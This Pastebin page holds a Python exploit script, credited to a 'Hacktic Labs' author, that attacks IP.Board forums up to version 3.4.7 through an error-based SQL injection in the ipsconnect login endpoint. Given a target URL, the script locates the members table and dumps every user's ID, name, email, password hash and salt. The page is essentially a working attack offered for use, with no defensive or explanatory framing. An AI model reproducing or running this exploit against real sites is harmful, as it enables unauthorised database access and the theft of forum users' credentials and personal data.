Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Rabu, Juni 03, 2014 - anon.grenxparta@gmail.com
- # IP.Board <= 3.4.7 SQLi (blind, error based);
- # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
- # Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs
- print '\n\n---------------------------------------------------------------------------------'
- print 'Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
- print '---------Script has been modified for different table prefix XXX_members---------'
- print '---------------------------------------------------------------------------------\n\n\n'
- url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
- url = url.rstrip('/')
- ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
- import sys, re
- import urllib2, urllib
- def inject(sql):
- try:
- urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
- except urllib2.HTTPError, e:
- if e.code == 503:
- data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
- txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
- if txt is not None:
- return txt.group(1)
- sys.exit('Error [3], received unexpected data:\n%s' % data)
- sys.exit('Error [1]')
- sys.exit('Error [2]')
- def get(name, table, num):
- sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
- s = int(inject('LENGTH((%s))' % sqli))
- if s < 31:
- return inject(sqli)
- else:
- r = ''
- for i in range(1, s+1, 31):
- r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
- return r
- members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
- n = inject('SELECT COUNT(*) FROM %s' % members_table)
- print '----------------------------------------------------------------------------'
- print '* Found %s users' % n
- print '----------------------------------------------------------------------------'
- for j in range(int(n)):
- print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
- print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
- print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
- print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
- print '----------------------------------------------------------------------------'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement